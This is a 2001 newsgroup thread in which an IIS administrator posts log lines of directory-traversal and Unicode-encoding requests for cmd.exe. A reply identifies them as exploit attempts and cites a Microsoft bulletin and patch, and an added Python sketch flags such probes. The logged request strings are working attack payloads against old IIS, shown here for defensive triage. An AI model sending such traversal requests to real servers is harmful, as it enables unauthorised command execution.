
[HELP]: Log analysis


Nuno Silva

May 18, 2001, 1:26:16 PM
Hi, I'm getting this type of line in my IIS 5.0 log files. Can anyone
explain to me whether it is what I think it is?
Is this someone trying to get into my server?
Thanks

2001-05-08 08:05:34 212.164.32.40 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:34 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:36 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..チ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:36 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..タ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:37 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..タ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:37 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..チ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:39 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..チ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:42 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:46 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:46 212.164.32.40 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:48 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�?ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:48 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�??ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:49 212.164.32.40 - 192.168.1.252 80 GET
/scripts/..�???ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:49 212.164.32.40 - 192.168.1.252 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:06 193.204.165.51 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:06 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:07 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..チ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:07 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..タ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..タ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..チ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:12 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..チ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:13 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..\../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:13 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�?ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:14 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�??ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:16 193.204.165.51 - 192.168.1.252 80 GET
/scripts/..�???ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 16:41:16 193.204.165.51 - 192.168.1.252 80 GET
/msadc/../../../../../../winnt/system32/cmd.exe /c+dir 302 -

2001-05-12 19:27:32 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:37 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:37 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..チ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:38 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..タ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:38 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..タ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:40 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..チ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:40 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..チ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:44 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:44 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..o../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:46 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:50 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�?ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:50 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�??ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:51 202.100.96.69 - 192.168.1.252 80 GET
/scripts/..�???ッ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:51 202.100.96.69 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:39:40 195.22.0.20 - 192.168.1.252 80 GET / - 302
Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
2001-05-12 22:47:19 216.35.116.90 - 192.168.1.252 80 GET /robots.txt - 302
Mozilla/3.0+(Slurp/si;+sl...@inktomi.com;+http://www.inktomi.com/slurp.html)

2001-05-15 09:57:31 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:42 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:53 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..チ%pc../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:54 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..タ%9v../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:55 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..タ%qf../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:55 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..チ%8s../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:57:57 195.235.161.237 - 192.168.1.252 80 GET
/scripts/..チ ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-15 09:58:02 195.235.161.237 - 192.168.1.252 80 GET
/winnt/system32/cmd.exe /c+dir 302 -


Chris Crowe

May 18, 2001, 1:37:16 PM
[This followup was posted to microsoft.public.inetserver.iis and a copy
was sent to the cited author.]

In article <BWcN6.3585$AN.61...@newsserver.ip.pt>,
nsi...@greatplains.pt says...

Yes, someone is trying to exploit your machine.

See this Microsoft Security Bulletin:
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

There is a new patch that fixes almost all security holes in IIS4 and 5
referred to in the above article.

--

Chris Crowe

Looking for IIS information then come to www.iisfaq.com
The home of the unofficial IIS FAQ....

ADSI Administration scripts - we have them - all free!!
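
Added example, not part of the original thread: a Python sketch that triages log lines in the field order shown in the question, flags requests whose path contains a `..` segment or targets `cmd.exe`, and groups them by client IP with the status codes returned. The sample lines, their addresses, the 200 status and the function names are constructed for illustration; every probe in the posted log received 302.

```python
from collections import defaultdict

# Constructed sample; field order as in the thread's log lines: date time c-ip
# cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = """\
2001-05-08 08:05:34 192.0.2.10 - 10.0.0.5 80 GET /scripts/../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:39 192.0.2.10 - 10.0.0.5 80 GET /scripts/..\ufffd ../winnt/system32/cmd.exe /c+dir 302 -
2001-05-08 08:05:49 192.0.2.10 - 10.0.0.5 80 GET /msadc/../../../../../../winnt/system32/cmd.exe /c+dir 302 -
2001-05-12 19:27:32 198.51.100.7 - 10.0.0.5 80 GET /winnt/system32/cmd.exe /c+dir 200 -
2001-05-12 19:39:40 203.0.113.20 - 10.0.0.5 80 GET / - 302 Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0)
"""

def parse_line(line):
    """Split one log line; the URI stem may contain spaces, so peel fields off both ends."""
    parts = line.split(" ")
    if line.startswith("#") or len(parts) < 11 or not parts[-2].isdigit():
        return None  # directive line, short line, or no numeric status
    return {"when": f"{parts[0]} {parts[1]}", "c_ip": parts[2],
            "stem": " ".join(parts[7:-3]), "query": parts[-3], "status": int(parts[-2])}

def is_probe(rec):
    """Heuristic: a path segment starting with '..' or a request for cmd.exe."""
    segments = rec["stem"].lower().replace("\\", "/").split("/")
    return segments[-1] == "cmd.exe" or any(s.startswith("..") for s in segments)

def summarize(log_text):
    """Group probe requests by client IP: count, first/last seen, status codes returned."""
    hits = defaultdict(lambda: {"count": 0, "first": None, "last": None, "statuses": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_probe(rec):
            h = hits[rec["c_ip"]]
            h["count"] += 1
            h["first"] = h["first"] or rec["when"]
            h["last"] = rec["when"]
            h["statuses"].add(rec["status"])
    return dict(hits)

def needs_review(summary):
    """Sources whose probes got a 2xx status, i.e. the server may have served the request."""
    return sorted(ip for ip, h in summary.items() if any(200 <= s < 300 for s in h["statuses"]))

if __name__ == "__main__":
    report = summarize(SAMPLE_LOG)
    for ip, h in sorted(report.items()):
        print(ip, h["count"], h["first"], h["last"], sorted(h["statuses"]))
    print("review first:", needs_review(report))
```

Parsing from both ends matters here because some of the logged paths contain a space after the decoded bytes, which would shift the status column under a plain whitespace split.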

Nuno Silva

May 18, 2001, 2:11:59 PM
OK thanks, by coincidence or not I just downloaded this patch and applied it in
the morning.

Many thanks

"Chris Crowe" <ch...@iisfaq.com> wrote in message
news:MPG.157024f7c...@news.microsoft.com...
